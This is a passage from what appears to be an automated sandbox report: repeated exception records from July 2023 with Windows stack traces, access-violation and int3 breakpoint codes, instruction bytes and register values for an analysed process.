0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514624 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514632 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 49493756	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13be1d4 0x13bdff1 0x13b81fd 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514368 registers.edi: 4514668 registers.eax: 0 registers.ebp: 4514680 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13be594 0x13bdff1 0x13b81fd 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514656 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514664 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 46462208	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13be1d4 0x13bdff1 0x13b8215 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514368 registers.edi: 4514668 registers.eax: 0 registers.ebp: 4514680 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13be594 0x13bdff1 0x13b8215 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514656 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514664 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 47955300	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13be1d4 0x13bdff1 0x13b8215 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514368 registers.edi: 4514668 registers.eax: 0 registers.ebp: 4514680 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13be594 0x13bdff1 0x13b8215 0x13b6fba 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514656 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514664 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 49448104	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bf91b 0x13beec6 0x13b5ca1 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4515476 registers.edi: 4515740 registers.eax: 0 registers.ebp: 4515484 registers.edx: 0 registers.ebx: 4517572 registers.esi: 49989788 registers.ecx: 49996764	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d2700 registers.esp: 1637712 registers.edi: 4660320 registers.eax: 4007680 registers.ebp: 1637852 registers.edx: 4294967295 registers.ebx: 1995636776 registers.esi: 5762616 registers.ecx: 0	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1636152 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1636484 registers.edx: 1636508 registers.ebx: 1636508 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1634592 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1634924 registers.edx: 1634948 registers.ebx: 1634948 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1633032 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1633364 registers.edx: 1633388 registers.ebx: 1633388 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1631472 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1631804 registers.edx: 1631828 registers.ebx: 1631828 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1629912 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1630244 registers.edx: 1630268 registers.ebx: 1630268 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1628352 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1628684 registers.edx: 1628708 registers.ebx: 1628708 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1626792 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1627124 registers.edx: 1627148 registers.ebx: 1627148 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1625232 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1625564 registers.edx: 1625588 registers.ebx: 1625588 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1623672 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1624004 registers.edx: 1624028 registers.ebx: 1624028 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 